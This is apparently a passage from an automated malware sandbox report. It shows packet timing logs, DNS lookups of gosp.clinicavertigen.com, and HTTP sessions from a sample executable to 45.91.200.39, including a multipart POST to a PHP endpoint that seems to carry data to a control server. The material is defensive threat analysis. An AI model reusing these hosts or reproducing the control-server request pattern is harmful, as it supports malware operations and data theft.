                                                                                              Oct 30, 2024 19:47:19.585474968 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.585511923 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.585648060 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.585661888 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.585704088 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.585711956 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.585746050 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.586071968 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.586086035 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.586139917 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.586147070 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.586190939 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.586745024 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.586760044 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.586815119 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.586823940 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.590863943 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.616588116 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.616602898 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.616708994 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.616718054 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.616756916 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.644861937 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.644880056 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.644942999 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.644965887 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.645004034 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.697575092 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.697596073 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.697632074 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.697648048 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.697666883 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.697685003 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.699542046 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.699556112 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.699606895 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.699615002 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.699666023 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.700537920 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.700552940 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.700617075 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.700624943 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.700664043 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.700900078 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.700915098 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.700969934 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.700978041 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.701015949 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.701335907 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.701349974 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.701405048 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.701416969 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.701453924 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.701845884 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.701858997 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.701913118 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.701920033 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.701953888 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.702457905 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.702471972 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.702512026 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.702517986 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.702542067 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.702560902 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.702729940 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.702747107 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.702795982 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.702804089 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.702857971 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.703488111 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.703502893 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.703555107 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.703562021 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.703594923 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.703769922 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.703784943 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.703834057 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.703840017 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.703881979 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.704163074 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.704175949 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.704231024 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.704240084 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.704274893 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.704602003 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.704627037 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.704674959 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.704682112 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.704726934 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.705717087 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.705732107 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.705785036 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.705794096 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.705830097 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.706062078 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.706078053 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.706127882 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.706134081 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.706175089 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.706496000 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.706511021 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.706563950 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.706571102 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.706607103 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.706702948 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.706716061 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.706765890 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.706773043 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.706811905 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.707102060 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.707115889 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.707163095 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.707173109 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.707182884 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.707207918 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.707472086 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.707487106 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.707537889 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.707545996 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.707581043 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.708606958 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.708619118 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.708671093 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.708678007 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.708714008 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.708919048 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.708933115 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.708981037 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.708987951 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.709023952 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.709558964 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.709573984 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.709619999 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.709626913 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.709661007 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.709914923 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.709928989 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.709975958 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.709984064 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.710027933 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.710160971 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.710177898 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.710223913 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.710231066 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.710268974 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.740092993 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.740107059 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.740211010 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.740225077 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.740272999 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.740495920 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.740511894 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.740564108 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.740571976 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.740612030 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.819876909 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.819897890 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.820053101 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.820064068 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.820122004 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.822913885 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.822931051 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.822992086 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.822999001 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.823035002 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.823816061 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.823831081 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.823880911 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.823889017 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.823925972 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.824239969 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.824253082 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.824305058 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.824310064 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.824353933 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.825016022 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.825031042 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.825086117 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.825093031 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.825129986 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.825349092 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.825367928 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.825412989 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.825419903 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.825459003 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.825748920 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.825762987 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.825805902 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.825813055 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.825850010 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.826286077 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.826301098 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.826351881 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.826358080 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.826392889 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.826564074 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.826577902 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.826626062 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.826633930 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.826674938 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.827055931 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.827070951 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.827126026 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.827131987 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.827167034 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.827780008 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.827794075 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.827855110 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.827861071 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.827896118 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.828102112 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.828114986 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.828160048 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.828166962 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.828206062 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.828423977 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.828438044 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.828486919 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.828493118 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.828528881 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.829319000 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.829334021 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.829381943 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.829387903 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.829421043 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.829749107 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.829767942 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.829806089 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.829813004 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.829828024 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.829843998 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.830498934 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.830513000 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.830575943 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.830583096 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.830620050 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.830984116 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.831039906 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.831208944 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.831267118 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.831274033 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.831285000 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.831316948 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.831322908 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.831331968 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.831376076 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.831753016 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.831774950 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.831809998 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.831815958 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.831829071 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.831847906 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.832818985 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.832839012 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.832880974 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.832887888 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.832909107 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.832921982 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.833128929 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.833158016 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.833184958 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.833190918 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.833214045 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.833231926 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.833971024 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.833982944 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.834033012 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.834039927 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.834055901 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.834085941 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.834273100 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.834287882 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.834336042 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.834343910 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.834386110 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.834532022 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.834546089 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.834587097 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.834595919 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.834640026 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.863626003 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.863728046 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.863739014 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.863744020 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.863786936 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.864346981 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.864367962 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:20.356194019 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:20.356453896 CET4973880192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:20.364886999 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:20.365552902 CET804973845.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:20.365618944 CET4973880192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:20.365736961 CET4973880192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:20.380696058 CET804973845.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:22.843914986 CET804973845.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:22.844033957 CET4973880192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:27.976875067 CET804973845.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:27.976943016 CET4973880192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:41.432807922 CET4973880192.168.2.445.91.200.39
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Oct 30, 2024 19:47:09.325018883 CET5151753192.168.2.41.1.1.1
                                                                                              Oct 30, 2024 19:47:09.362833023 CET53515171.1.1.1192.168.2.4
                                                                                              Oct 30, 2024 19:47:31.657464981 CET5361235162.159.36.2192.168.2.4
                                                                                              Oct 30, 2024 19:47:32.292314053 CET5067653192.168.2.41.1.1.1
                                                                                              Oct 30, 2024 19:47:32.301060915 CET53506761.1.1.1192.168.2.4
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Oct 30, 2024 19:47:09.325018883 CET192.168.2.41.1.1.10xfb15Standard query (0)gosp.clinicavertigen.comA (IP address)IN (0x0001)false
                                                                                              Oct 30, 2024 19:47:32.292314053 CET192.168.2.41.1.1.10xc5e3Standard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Oct 30, 2024 19:47:09.362833023 CET1.1.1.1192.168.2.40xfb15No error (0)gosp.clinicavertigen.com87.106.236.48A (IP address)IN (0x0001)false
                                                                                              Oct 30, 2024 19:47:32.301060915 CET1.1.1.1192.168.2.40xc5e3Name error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                              • gosp.clinicavertigen.com
                                                                                              • 45.91.200.39
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.44973045.91.200.39806556C:\Users\user\Desktop\b4s45TboUL.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 30, 2024 19:46:59.510721922 CET87OUTGET / HTTP/1.1
                                                                                              Host: 45.91.200.39
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Oct 30, 2024 19:47:00.326957941 CET203INHTTP/1.1 200 OK
                                                                                              Date: Wed, 30 Oct 2024 18:47:00 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Oct 30, 2024 19:47:00.330980062 CET416OUTPOST /eaa194fa594ff9c2.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----AFCFHJJECAEHJJKEHIDB
                                                                                              Host: 45.91.200.39
                                                                                              Content-Length: 217
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
